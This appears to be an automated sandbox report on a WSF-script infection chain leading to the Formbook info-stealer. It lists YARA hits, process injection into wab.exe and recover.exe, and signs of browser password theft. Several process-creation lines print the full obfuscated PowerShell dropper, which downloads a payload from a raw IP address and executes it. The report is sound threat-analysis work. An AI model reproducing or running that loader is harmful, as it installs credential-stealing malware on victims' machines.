Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353F0E0 13_2_0353F0E0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_035370E9 13_2_035370E9
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034A4750 13_2_034A4750
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03480770 13_2_03480770
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0347C7C0 13_2_0347C7C0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353F7B0 13_2_0353F7B0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_035316CC 13_2_035316CC
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0349C6E0 13_2_0349C6E0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03537571 13_2_03537571
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03480535 13_2_03480535
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03540591 13_2_03540591
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0351D5B0 13_2_0351D5B0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03532446 13_2_03532446
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03471460 13_2_03471460
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353F43F 13_2_0353F43F
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0352E4F6 13_2_0352E4F6
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353AB40 13_2_0353AB40
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353FB76 13_2_0353FB76
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03536BD7 13_2_03536BD7
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034BDBF9 13_2_034BDBF9
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0349FB80 13_2_0349FB80
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03537A46 13_2_03537A46
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353FA49 13_2_0353FA49
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034F3A6C 13_2_034F3A6C
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0352DAC6 13_2_0352DAC6
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0347EA80 13_2_0347EA80
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034C5AA0 13_2_034C5AA0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0351DAAC 13_2_0351DAAC
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03489950 13_2_03489950
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0349B950 13_2_0349B950
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03496962 13_2_03496962
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034829A0 13_2_034829A0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0354A9A6 13_2_0354A9A6
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03482840 13_2_03482840
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0348A840 13_2_0348A840
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034838E0 13_2_034838E0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034AE8F0 13_2_034AE8F0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034668B8 13_2_034668B8
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034F4F40 13_2_034F4F40
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353FF09 13_2_0353FF09
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034A0F30 13_2_034A0F30
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03472FC8 13_2_03472FC8
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0348CFE0 13_2_0348CFE0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03481F92 13_2_03481F92
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353FFB1 13_2_0353FFB1
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03480E59 13_2_03480E59
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353EE26 13_2_0353EE26
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353EEDB 13_2_0353EEDB
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353CE93 13_2_0353CE93
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03492E90 13_2_03492E90
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03489EB0 13_2_03489EB0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03483D40 13_2_03483D40
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03531D5A 13_2_03531D5A
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03537D73 13_2_03537D73
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0348AD00 13_2_0348AD00
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0349FDC0 13_2_0349FDC0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0347ADE0 13_2_0347ADE0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03498DBF 13_2_03498DBF
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03480C00 13_2_03480C00
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_034F9C32 13_2_034F9C32
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_0353FCF2 13_2_0353FCF2
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03470CF2 13_2_03470CF2
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_03520CB5 13_2_03520CB5
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D011E0 13_2_02D011E0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CFC3C8 13_2_02CFC3C8
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CFC3D0 13_2_02CFC3D0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CFA670 13_2_02CFA670
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02CFC5F0 13_2_02CFC5F0
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D19C50 13_2_02D19C50
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D02D10 13_2_02D02D10
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D02D0B 13_2_02D02D0B
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FDF7E54 appears 96 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FDE5130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FE1EA12 appears 86 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FD9B970 appears 268 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 1FE2F290 appears 105 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 034EEA12 appears 84 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 034C7E54 appears 88 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 034B5130 appears 36 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 034FF290 appears 105 times
Source: C:\Windows\SysWOW64\recover.exe Code function: String function: 0346B970 appears 266 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: CDS AC 661171855-VN1 SOA.wsf Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi64_7108.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_1364.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1364, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winWSF@19/8@3/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Thermoswitch172.Med Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehedxga5.unh.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7108
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1364
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: recover.exe, 0000000D.00000002.3357718213.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3361219173.0000000007C04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Process created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\recover.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $" Jump to behavior
